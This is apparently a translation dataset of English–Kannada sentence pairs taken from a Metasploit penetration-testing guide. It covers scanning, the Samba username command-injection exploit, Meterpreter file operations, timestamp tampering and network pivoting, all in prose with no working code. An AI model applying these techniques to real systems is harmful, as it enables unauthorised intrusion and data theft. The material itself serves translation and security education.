| {"en":"The scan results, as with the previous auxiliary modules, will get stored in the Metasploit database.","translation":"ಸ್ಕಾನಿನ ಫಲಿತಾಂಶಗಳು, ಹಿಂದಿನ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ಗಳಂತೆ, ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಡೇಟಾಬೇಸ್ನಲ್ಲಿ ಸಂಗ್ರಹಿಸಲ್ಪಡುತ್ತವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The Simple Mail Transfer Protocol (SMTP) service has two internal commands that allow the enumeration of users.","translation":"ಸರಳ ಮೇಲ್ ವರ್ಗಾವಣೆ ಪ್ರೋಟೋಕಾಲ್ (SMTP) ಸೇವೆಯು ಬಳಕೆದಾರರನ್ನು ಎಣಿಸಲು ಅನುಮತಿಸುವ ಎರಡು ಆಂತರಿಕ ಆಜ್ಞೆಗಳನ್ನು ಹೊಂದಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The SMTP User Enumeration Utility auxiliary module, through the implementation of these SMTP commands, can reveal a list of valid users.","translation":"SMTP ಬಳಕೆದಾರರ ಎಣಿಕೆ ಉಪಯುಕ್ತತೆ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್, ಈ SMTP ಆಜ್ಞೆಗಳ ಅನುಷ್ಠಾನದ ಮೂಲಕ, ಮಾನ್ಯ ಬಳಕೆದಾರರ ಪಟ್ಟಿಯನ್ನು ಬಹಿರಂಗಪಡಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Metasploit has a built-in auxiliary module specifically for sweeping SNMP devices.","translation":"ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ SNMP ಸಾಧನಗಳನ್ನು ಸ್ವೀಪ್ ಮಾಡಲು ನಿರ್ದಿಷ್ಟವಾಗಿ ಅಂತರ್ನಿರ್ಮಿತ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಹೊಂದಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can gather loads of information using SNMP scanning modules, such as open ports, services, hostnames, processes, and uptime.","translation":"SNMP ಸ್ಕ್ಯಾನಿಂಗ್ ಮಾಡ್ಯೂಲ್ಗಳನ್ನು ಬಳಸಿಕೊಂಡು ನಾವು ತೆರೆದ ಪೋರ್ಟ್ಗಳು, ಸೇವೆಗಳು, ಹೋಸ್ಟ್ಹೆಸರುಗಳು, ಪ್ರಕ್ರಿಯೆಗಳು ಮತ್ತು ಅಪ್ಟೈಮ್ನಂತಹ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Hypertext Transfer Protocol (HTTP) is an application protocol that serves as the foundation of data communication for the World Wide Web.","translation":"ಹೈಪರ್ಟೆಕ್ಸ್ಟ್ ವರ್ಗಾವಣೆ ಪ್ರೋಟೋಕಾಲ್ (HTTP) ಒಂದು ಅಪ್ಲಿಕೇಶನ್ ಪ್ರೋಟೋಕಾಲ್ ಆಗಿದ್ದು, ಇದು ವರ್ಲ್ಡ್ ವೈಡ್ ವೆಬ್ಗಾಗಿ ಡೇಟಾ ಸಂವಹನದ ಆಧಾರವಾಗಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The HTTP SSL Certificate Checker auxiliary module will check the certificate of the specified web servers.","translation":"HTTP SSL ಪ್ರಮಾಣಪತ್ರ ಪರಿಶೀಲಕ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ವೆಬ್ ಸರ್ವರ್ಗಳ ಪ್ರಮಾಣಪತ್ರವನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To run the HTTP Robots.txt Content Scanner auxiliary module, we will specify the test path to find the robots.txt file and the target IP address.","translation":"HTTP Robots.txt ವಿಷಯ ಸ್ಕ್ಯಾನರ್ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಚಲಾಯಿಸಲು, ನಾವು robots.txt ಫೈಲ್ ಮತ್ತು ಗುರಿ IP ವಿಳಾಸವನ್ನು ಹುಡುಕಲು ಪರೀಕ್ಷಾ ಮಾರ್ಗವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The HTTP Writable Path PUT/DELETE File Access auxiliary module can abuse misconfigured web servers.","translation":"HTTP ಬರೆಯಬಹುದಾದ ಪಾತ್ PUT/DELETE ಫೈಲ್ ಪ್ರವೇಶ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ತಪ್ಪಾಗಿ ಕಾನ್ಫಿಗರ್ ಮಾಡಲಾದ ವೆಬ್ ಸರ್ವರ್ಗಳನ್ನು ದುರುಪಯೋಗಪಡಿಸಿಕೊಳ್ಳಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"To run the auxiliary module, we need to specify the target address, or range, the target port, and the path to the Jenkins-CI application.","translation":"ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಚಲಾಯಿಸಲು, ನಾವು ಗುರಿ ವಿಳಾಸ ಅಥವಾ ಶ್ರೇಣಿ, ಗುರಿ ಪೋರ್ಟ್ ಮತ್ತು ಜೆನ್ಕಿನ್ಸ್-ಸಿಐ ಅಪ್ಲಿಕೇಶನ್ಗೆ ಮಾರ್ಗವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows Remote Management (WinRM) is the Microsoft implementation of the WS-Management Protocol.","translation":"ವಿಂಡೋಸ್ ರಿಮೋಟ್ ಮ್ಯಾನೇಜ್ಮೆಂಟ್ (WinRM) WS-ಮ್ಯಾನೇಜ್ಮೆಂಟ್ ಪ್ರೋಟೋಕಾಲ್ನ ಮೈಕ್ರೋಸಾಫ್ಟ್ ಅನುಷ್ಠಾನವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To use the WinRM Authentication Method Detection auxiliary module, set the target address range in RHOSTS and type run.","translation":"WinRM ದೃಢೀಕರಣ ವಿಧಾನ ಪತ್ತೆ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸಲು, RHOSTS ನಲ್ಲಿ ಗುರಿ ವಿಳಾಸ ಶ್ರೇಣಿಯನ್ನು ಹೊಂದಿಸಿ ಮತ್ತು ರನ್ ಟೈಪ್ ಮಾಡಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"To run the WinRM Command Runner auxiliary module, we need to set the targets IP address, the Windows command to run, the username Administrator, and password vagrant.","translation":"WinRM ಕಮಾಂಡ್ ರನ್ನರ್ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಚಲಾಯಿಸಲು, ನಾವು ಗುರಿಗಳ IP ವಿಳಾಸ, ಚಲಾಯಿಸಲು ವಿಂಡೋಸ್ ಆಜ್ಞೆ, ಬಳಕೆದಾರಹೆಸರು ನಿರ್ವಾಹಕ ಮತ್ತು ಪಾಸ್ವರ್ಡ್ ವಾಗ್ರಾಂಟ್ ಅನ್ನು ಹೊಂದಿಸಬೇಕಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Nessus is one of the most widely used vulnerability scanners.","translation":"ನೆಸ್ಸಸ್ ಅತ್ಯಂತ ವ್ಯಾಪಕವಾಗಿ ಬಳಸಲಾಗುವ ದುರ್ಬಲತೆ ಸ್ಕ್ಯಾನರ್ಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To test Nessus, you can use Nessus Home, which allows you to scan your personal home network.","translation":"ನೆಸ್ಸಸ್ ಅನ್ನು ಪರೀಕ್ಷಿಸಲು, ನೀವು ನೆಸ್ಸಸ್ ಹೋಮ್ ಅನ್ನು ಬಳಸಬಹುದು, ಇದು ನಿಮ್ಮ ವೈಯಕ್ತಿಕ ಹೋಮ್ ನೆಟ್ವರ್ಕ್ ಅನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To start working with Nessus in msfconsole, we will have to load Nessus and then connect it with the server.","translation":"msfconsole ನಲ್ಲಿ ನೆಸ್ಸಸ್ನೊಂದಿಗೆ ಕೆಲಸ ಮಾಡಲು ಪ್ರಾರಂಭಿಸಲು, ನಾವು ನೆಸ್ಸಸ್ ಅನ್ನು ಲೋಡ್ ಮಾಡಬೇಕು ಮತ್ತು ನಂತರ ಅದನ್ನು ಸರ್ವರ್ನೊಂದಿಗೆ ಸಂಪರ್ಕಿಸಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To connect to Nessus, use the nessus_connect command with the Nessus credentials, hostname, port (if not using the default port 8834), and verify the SSL certificate.","translation":"ನೆಸ್ಸಸ್ಗೆ ಸಂಪರ್ಕಿಸಲು, ನೆಸ್ಸಸ್ ರುಜುವಾತುಗಳು, ಹೋಸ್ಟ್ಹೆಸರು, ಪೋರ್ಟ್ (ಡೀಫಾಲ್ಟ್ ಪೋರ್ಟ್ 8834 ಅನ್ನು ಬಳಸದಿದ್ದರೆ) ಮತ್ತು SSL ಪ್ರಮಾಣಪತ್ರವನ್ನು ಪರಿಶೀಲಿಸುವ ಮೂಲಕ nessus_connect ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"To create a new Nessus scan, we use the nessus_scan_new command followed by the UUID of the policy we want to use, the name for the scan, description, and the target.","translation":"ಹೊಸ ನೆಸ್ಸಸ್ ಸ್ಕ್ಯಾನ್ ರಚಿಸಲು, ನಾವು nessus_scan_new ಆಜ್ಞೆಯನ್ನು ಬಳಸುತ್ತೇವೆ, ಅದರ ನಂತರ ನಾವು ಬಳಸಲು ಬಯಸುವ ನೀತಿಯ UUID, ಸ್ಕ್ಯಾನ್ಗಾಗಿ ಹೆಸರು, ವಿವರಣೆ ಮತ್ತು ಗುರಿಯನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"With the scan results imported into Metasploit, we can use the msfconsole database commands to find services and vulnerabilities and try to exploit them.","translation":"ಸ್ಕ್ಯಾನ್ ಫಲಿತಾಂಶಗಳನ್ನು ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ಗೆ ಆಮದು ಮಾಡಿದ ನಂತರ, ಸೇವೆಗಳು ಮತ್ತು ದುರ್ಬಲತೆಗಳನ್ನು ಹುಡುಕಲು ಮತ್ತು ಅವುಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳಲು ಪ್ರಯತ್ನಿಸಲು ನಾವು msfconsole ಡೇಟಾಬೇಸ್ ಆಜ್ಞೆಗಳನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"In this recipe, we will cover another important vulnerability scanner called NeXpose.","translation":"ಈ ಪಾಕವಿಧಾನದಲ್ಲಿ, ನಾವು ನೆಕ್ಸ್ಪೋಸ್ ಎಂಬ ಮತ್ತೊಂದು ಪ್ರಮುಖ ದುರ್ಬಲತೆ ಸ್ಕ್ಯಾನರ್ ಅನ್ನು ಒಳಗೊಳ್ಳುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Unpatched systems are a safe haven for hackers.","translation":"ಅಪ್ಡೇಟ್ ಮಾಡದ ಸಿಸ್ಟಮ್ಗಳು ಹ್ಯಾಕರ್ಗಳಿಗೆ ಸುರಕ್ಷಿತ ತಾಣವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Regularly patching and updating the operating system is essential.","translation":"ನಿಯಮಿತವಾಗಿ ಪ್ಯಾಚ್ ಮಾಡುವುದು ಮತ್ತು ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ಅನ್ನು ನವೀಕರಿಸುವುದು ಅತ್ಯಗತ್ಯ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we will focus on vulnerabilities that are reported in some of the most popular services and operating systems.","translation":"ಈ ಅಧ್ಯಾಯದಲ್ಲಿ, ನಾವು ಅತ್ಯಂತ ಜನಪ್ರಿಯ ಸೇವೆಗಳು ಮತ್ತು ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ಗಳಲ್ಲಿ ವರದಿಯಾದ ದೌರ್ಬಲ್ಯಗಳ ಮೇಲೆ ಗಮನಹರಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Pentesters start looking for available exploits for the particular service or operating system flaws.","translation":"ನಿರ್ದಿಷ್ಟ ಸೇವೆ ಅಥವಾ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ದೋಷಗಳಿಗಾಗಿ ಪೆನೆಸ್ಟರ್ಗಳು ಲಭ್ಯವಿರುವ ಶೋಷಣೆಗಳನ್ನು ಹುಡುಕಲು ಪ್ರಾರಂಭಿಸುತ್ತಾರೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We will focus on some of the most widely used operating systems of Microsoft, and some flavors of Linux.","translation":"ನಾವು ಮೈಕ್ರೋಸಾಫ್ಟ್ನ ಕೆಲವು ಹೆಚ್ಚು ವ್ಯಾಪಕವಾಗಿ ಬಳಸಲಾಗುವ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ಗಳು ಮತ್ತು ಲಿನಕ್ಸ್ನ ಕೆಲವು ವಿಧಗಳ ಮೇಲೆ ಗಮನಹರಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We will also look at how to use exploits and set up their parameters to make them executable on the target machine.","translation":"ಶೋಷಣೆಗಳನ್ನು ಹೇಗೆ ಬಳಸುವುದು ಮತ್ತು ಅವುಗಳನ್ನು ಟಾರ್ಗೆಟ್ ಯಂತ್ರದಲ್ಲಿ ಕಾರ್ಯಗತಗೊಳಿಸಲು ಅವುಗಳ ನಿಯತಾಂಕಗಳನ್ನು ಹೇಗೆ ಹೊಂದಿಸುವುದು ಎಂಬುದನ್ನು ಸಹ ನಾವು ನೋಡುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"It is essential to understand the usage of exploits so that you can overcome some common errors that may arise due to misconfiguration of the parameters.","translation":"ನಿಯತಾಂಕಗಳ ತಪ್ಪಾದ ಸಂರಚನೆಯಿಂದ ಉಂಟಾಗಬಹುದಾದ ಕೆಲವು ಸಾಮಾನ್ಯ ದೋಷಗಳನ್ನು ನೀವು ಹೇಗೆ ಜಯಿಸಬಹುದು ಎಂಬುದನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳುವುದು ಅತ್ಯಗತ್ಯ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"In order to start using exploits on your target, the first thing required is to scan the target for open ports and services.","translation":"ನಿಮ್ಮ ಗುರಿಯ ಮೇಲೆ ಶೋಷಣೆಗಳನ್ನು ಬಳಸಲು ಪ್ರಾರಂಭಿಸಲು, ಅಗತ್ಯವಿರುವ ಮೊದಲನೆಯದು ತೆರೆದ ಪೋರ್ಟ್ಗಳು ಮತ್ತು ಸೇವೆಗಳಿಗಾಗಿ ಗುರಿಯನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುವುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Once you have gathered enough information about the target, the next step is to select exploits accordingly.","translation":"ಗುರಿಯ ಬಗ್ಗೆ ಸಾಕಷ್ಟು ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಿದ ನಂತರ, ಮುಂದಿನ ಹಂತವೆಂದರೆ ಅದರ ಪ್ರಕಾರ ಶೋಷಣೆಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡುವುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"MSFconsole is the most popular interface for the Metasploit Framework.","translation":"MSFconsole ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಫ್ರೇಮ್ವರ್ಕ್ಗಾಗಿ ಅತ್ಯಂತ ಜನಪ್ರಿಯ ಇಂಟರ್ಫೇಸ್ ಆಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To display the help menu, simply type the help command inside msfconsole.","translation":"ಸಹಾಯ ಮೆನುವನ್ನು ಪ್ರದರ್ಶಿಸಲು, msfconsole ಒಳಗೆ ಸಹಾಯ ಆಜ್ಞೆಯನ್ನು ಟೈಪ್ ಮಾಡಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Linux is one of the most widely used operating systems.","translation":"ಲಿನಕ್ಸ್ ಅತ್ಯಂತ ವ್ಯಾಪಕವಾಗಿ ಬಳಸಲಾಗುವ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"We will be using the Metasploitable 2, for our vulnerable Linux machine in this recipe.","translation":"ನಾವು ಈ ಪಾಕವಿಧಾನದಲ್ಲಿ ನಮ್ಮ ದುರ್ಬಲ ಲಿನಕ್ಸ್ ಯಂತ್ರಕ್ಕಾಗಿ ಮೆಟಾಸ್ಪ್ಲಾಯಿಟಬಲ್ 2 ಅನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we know the version of the Samba daemon running, we can search for vulnerabilities.","translation":"ಸಂಭಾ ಡೀಮನ್ನ ಚಾಲನೆಯಲ್ಲಿರುವ ಆವೃತ್ತಿ ನಮಗೆ ತಿಳಿದಿರುವುದರಿಂದ, ನಾವು ದೌರ್ಬಲ್ಯಗಳನ್ನು ಹುಡುಕಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Using the search command and filtering by CVE, setting the type to display only exploits and the keyword samba, we get a couple of exploits that we might be able to use.","translation":"ಹುಡುಕಾಟ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ ಮತ್ತು CVE ಮೂಲಕ ಫಿಲ್ಟರ್ ಮಾಡುವ ಮೂಲಕ, ಪ್ರಕಾರವನ್ನು ಪ್ರದರ್ಶಿಸಲು ಮಾತ್ರ ಶೋಷಣೆಗಳನ್ನು ಹೊಂದಿಸಿ ಮತ್ತು ಕೀವರ್ಡ್ ಸಂಭಾ, ನಾವು ಬಳಸಲು ಸಾಧ್ಯವಾಗುವ ಕೆಲವು ಶೋಷಣೆಗಳನ್ನು ಪಡೆಯುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"To select the exploit, employ the use command followed by the exploit name.","translation":"ಶೋಷಣೆಯನ್ನು ಆಯ್ಕೆ ಮಾಡಲು, ಶೋಷಣೆಯ ಹೆಸರಿನ ನಂತರ ಬಳಕೆಯ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"By specifying a username containing shell meta characters, attackers can execute arbitrary commands.","translation":"ಶೆಲ್ ಮೆಟಾ ಅಕ್ಷರಗಳನ್ನು ಹೊಂದಿರುವ ಬಳಕೆದಾರ ಹೆಸರನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವ ಮೂಲಕ, ದಾಳಿಕೋರರು ಯಾವುದೇ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"No authentication is needed to exploit this vulnerability.","translation":"ಈ ದೌರ್ಬಲ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳಲು ಯಾವುದೇ ದೃಢೀಕರಣದ ಅಗತ್ಯವಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Upon successful execution of the exploit, we will be provided with shell connectivity with our target machine.","translation":"ಶೋಷಣೆಯ ಯಶಸ್ವಿ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯ ನಂತರ, ನಮ್ಮ ಗುರಿ ಯಂತ್ರದೊಂದಿಗೆ ಶೆಲ್ ಸಂಪರ್ಕವನ್ನು ಒದಗಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To manipulate sessions, we use the sessions command.","translation":"ಸೆಷನ್ಗಳನ್ನು ಕುಶಲತೆಯಿಂದ ನಿರ್ವಹಿಸಲು, ನಾವು ಸೆಷನ್ಸ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The C:\\Users\\Public\\Documents\\jack_of_hearts.docx file gets downloaded in the root folder of our attacking machine.","translation":"ನಮ್ಮ ದಾಳಿ ಮಾಡುವ ಯಂತ್ರದ ಮೂಲ ಫೋಲ್ಡರ್ನಲ್ಲಿ C:\\Users\\Public\\Documents\\jack_of_hearts.docx ಫೈಲ್ ಡೌನ್ಲೋಡ್ ಆಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Similarly, we can use the upload command to send any file to the target machine.","translation":"ಅದೇ ರೀತಿ, ಯಾವುದೇ ಫೈಲ್ ಅನ್ನು ಗುರಿ ಯಂತ್ರಕ್ಕೆ ಕಳುಹಿಸಲು ನಾವು ಅಪ್ಲೋಡ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To remove a file or a directory from the target machine, we can use the rm command.","translation":"ಗುರಿ ಯಂತ್ರದಿಂದ ಫೈಲ್ ಅಥವಾ ಡೈರೆಕ್ಟರಿಯನ್ನು ತೆಗೆದುಹಾಕಲು, ನಾವು rm ಆಜ್ಞೆಯನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Editing files using Meterpreter can be done by using the edit command, which uses vim so all the editor's commands are available.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ ಬಳಸಿ ಫೈಲ್ಗಳನ್ನು ಸಂಪಾದಿಸುವುದನ್ನು ಎಡಿಟ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸುವ ಮೂಲಕ ಮಾಡಬಹುದು, ಇದು ವಿಮ್ ಅನ್ನು ಬಳಸುತ್ತದೆ ಆದ್ದರಿಂದ ಎಲ್ಲಾ ಸಂಪಾದಕರ ಆಜ್ಞೆಗಳು ಲಭ್ಯವಿವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"One of my favorite commands is the show_mount command, which allows you to list all mount points/logical drives in the target system.","translation":"ನನ್ನ ನೆಚ್ಚಿನ ಆಜ್ಞೆಗಳಲ್ಲಿ ಒಂದಾದ show_mount ಆಜ್ಞೆಯಾಗಿದ್ದು, ಇದು ಗುರಿ ವ್ಯವಸ್ಥೆಯಲ್ಲಿರುವ ಎಲ್ಲಾ ಮೌಂಟ್ ಪಾಯಿಂಟ್ಗಳು/ತಾರ್ಕಿಕ ಡ್ರೈವ್ಗಳನ್ನು ಪಟ್ಟಿ ಮಾಡಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To display all the available commands, you can use the help command followed by the group of commands you want to display.","translation":"ಲಭ್ಯವಿರುವ ಎಲ್ಲಾ ಆಜ್ಞೆಗಳನ್ನು ಪ್ರದರ್ಶಿಸಲು, ನೀವು ಸಹಾಯ ಆಜ್ಞೆಯನ್ನು ಬಳಸಬಹುದು, ನಂತರ ನೀವು ಪ್ರದರ್ಶಿಸಲು ಬಯಸುವ ಆಜ್ಞೆಗಳ ಗುಂಪನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Meterpreter gives us complete access to the target machine by setting up an interactive command prompt.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ ಸಂವಾದಾತ್ಮಕ ಕಮಾಂಡ್ ಪ್ರಾಂಪ್ಟ್ ಅನ್ನು ಸ್ಥಾಪಿಸುವ ಮೂಲಕ ಗುರಿ ಯಂತ್ರಕ್ಕೆ ಸಂಪೂರ್ಣ ಪ್ರವೇಶವನ್ನು ನೀಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also drop a shell session to work in the default Windows DOS mode, but it will not have as many functionalities.","translation":"ನಾವು ಡೀಫಾಲ್ಟ್ ವಿಂಡೋಸ್ DOS ಮೋಡ್ನಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ಶೆಲ್ ಸೆಷನ್ ಅನ್ನು ಸಹ ಬಿಡಬಹುದು, ಆದರೆ ಇದು ಹೆಚ್ಚಿನ ಕಾರ್ಯಗಳನ್ನು ಹೊಂದಿರುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This was a quick reference to some of the important filesystem commands of Meterpreter, which can help us in exploring the files present on the target machine.","translation":"ಇದು ಮೀಟರ್ಪ್ರಿಟರ್ನ ಕೆಲವು ಪ್ರಮುಖ ಫೈಲ್ಸಿಸ್ಟಮ್ ಆಜ್ಞೆಗಳಿಗೆ ತ್ವರಿತ ಉಲ್ಲೇಖವಾಗಿದೆ, ಇದು ಗುರಿ ಯಂತ್ರದಲ್ಲಿರುವ ಫೈಲ್ಗಳನ್ನು ಅನ್ವೇಷಿಸಲು ನಮಗೆ ಸಹಾಯ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"In the next recipe, we will look at a very interesting Meterpreter command called timestomp, which can be used to modify the file attributes on the target machine.","translation":"ಮುಂದಿನ ಪಾಕವಿಧಾನದಲ್ಲಿ, ನಾವು ಟೈಮ್ಸ್ಟಾಂಪ್ ಎಂಬ ಅತ್ಯಂತ ಆಸಕ್ತಿದಾಯಕ ಮೀಟರ್ಪ್ರಿಟರ್ ಆಜ್ಞೆಯನ್ನು ನೋಡುತ್ತೇವೆ, ಇದನ್ನು ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ಫೈಲ್ ಗುಣಲಕ್ಷಣಗಳನ್ನು ಮಾರ್ಪಡಿಸಲು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Meterpreter provides us with some useful networking commands as well.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ ನಮಗೆ ಕೆಲವು ಉಪಯುಕ್ತ ನೆಟ್ವರ್ಕಿಂಗ್ ಆಜ್ಞೆಗಳನ್ನು ಸಹ ಒದಗಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"These commands can be useful in understanding the network structure of the target user.","translation":"ಈ ಆಜ್ಞೆಗಳು ಗುರಿ ಬಳಕೆದಾರರ ನೆಟ್ವರ್ಕ್ ರಚನೆಯನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು ಉಪಯುಕ್ತವಾಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"We can analyze whether the system belongs to a LAN or if it is a standalone system.","translation":"ಸಿಸ್ಟಮ್ LAN ಗೆ ಸೇರಿದ್ದಾರೆಯೇ ಅಥವಾ ಅದು ಸ್ವತಂತ್ರ ವ್ಯವಸ್ಥೆಯೇ ಎಂದು ನಾವು ವಿಶ್ಲೇಷಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also find out the IP range, DNS, and other information.","translation":"ನಾವು IP ಶ್ರೇಣಿ, DNS ಮತ್ತು ಇತರ ಮಾಹಿತಿಯನ್ನು ಸಹ ಕಂಡುಹಿಡಿಯಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Such network information can be useful when we have to perform pivoting.","translation":"ನಾವು ಪಿವೋಟಿಂಗ್ ಕಾರ್ಯನಿರ್ವಹಿಸಬೇಕಾದಾಗ ಅಂತಹ ನೆಟ್ವರ್ಕ್ ಮಾಹಿತಿ ಉಪಯುಕ್ತವಾಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Pivoting is a concept by which we can compromise other machines on the same network in which our target is present.","translation":"ಪಿವೋಟಿಂಗ್ ಎನ್ನುವುದು ನಮ್ಮ ಗುರಿ ಇರುವ ಅದೇ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಇತರ ಯಂತ್ರಗಳನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಬಹುದಾದ ಒಂದು ಪರಿಕಲ್ಪನೆಯಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
